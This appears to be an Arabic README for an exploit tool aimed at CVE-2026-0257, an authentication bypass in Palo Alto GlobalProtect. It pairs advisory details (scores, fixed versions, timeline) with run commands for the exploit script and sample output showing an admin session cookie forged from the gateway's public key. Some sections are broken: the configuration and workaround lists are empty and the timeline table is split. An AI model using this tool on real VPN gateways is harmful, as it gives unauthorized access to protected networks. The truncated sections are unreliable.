
CVE-2026-0257
PAN-OS: ثغرات تجاوز المصادقة في GlobalProtect
تجاوز المصادقة في بوابة GlobalProtect والعبّارة
CVE-2026-0257 هي ثغرة تجاوز مصادقة تؤثر على مكونات بوابة GlobalProtect وعبّارتها في برنامج PAN-OS من Palo Alto Networks.
يمكن لمهاجم عن بعد غير مصادق تجاوز القيود الأمنية وإنشاء اتصال VPN غير مصرح به بجدران الحماية المتأثرة.
ملاحظة: Panorama و Cloud NGFW غير متأثرتين.
| المقياس | النتيجة | التصنيف |
|---|---|---|
| CVSS v4.0 | 7.8 / 4.7 | عالٍ / متوسط |
| CVSS v3.x | حتى 9.8 | حرج |
| الإلحاح | الأعلى | - |
المتجه (مثال CVSS 4.0):
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N
تسمح ثغرات تجاوز المصادقة في بوابة GlobalProtect وعبّارتها في برنامج PAN-OS® من Palo Alto Networks للمهاجم بتجاوز القيود الأمنية وإنشاء اتصال VPN غير مصرح به.
تعود المشكلة إلى CWE-565: الاعتماد على ملفات تعريف الارتباط دون التحقق من الصحة والتكامل.
غير المتأثر:
تتطلب هذه الثغرة التكوين التالي لتكون قابلة للاستغلال:
تأثير كبير على السرية والتكامل للشبكات المحمية.
python3 CVE-2026-0257.py --target vpn.company.com
python3 CVE-2026-0257.py --target 192.168.1.100 --user administrator --verbose
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0257 - GlobalProtect Auth Bypass ║
║ Public Key Cookie Forging Exploit ║
║ Author: 0xBlackash ║
╚══════════════════════════════════════════════════════════════╝
[*] Connecting to vpn.company.com:443 to extract certificate chain...
[+] Found 2048-bit RSA key
[*] Forging authentication cookie for user: admin
[1/1] Trying public key...
Cookie (first 60 chars): eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
[+] SUCCESS! Authentication Bypass Achieved!
Username : admin
Cookie : eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
الإصدارات المُصلحة (طبق عاجلاً):
| إصدار PAN-OS | الإصدار المُصلح |
|---|---|
| 12.1 | ≥ 12.1.4-h6، ≥ 12.1.7 |
| 11.2 | ≥ 11.2.4-h17، ≥ 11.2.7-h14، إلخ. |
| 11.1 | ≥ 11.1.4-h33، ≥ 11.1.7-h6، إلخ. |
| 10.2 | ≥ 10.2.7-h34، ≥ 10.2.10-h36، إلخ. |
Prisma Access أيضًا لديها إصدارات مُصلحة مقابلة.
حلول بديلة فورية (إذا لم يكن التصحيح ممكنًا):
| التاريخ | الحدث |
|---|---|
| 2026-05-13 | نشر CVE + النشرة الأولية |
| 2026-05-17 | ملاحظة الاستغلال في البرية |
| 2026-05-29 |
التوصية: قم بالتصحيح فورًا — اعتبره حرجًا على الرغم من درجة CVSS الأساسية بسبب الاستغلال النشط.
مُولد بأسلوب README — 30 مايو 2026
| تحديث Palo Alto + إضافة CISA KEV |
| 2026-05-30 | هذا التقرير |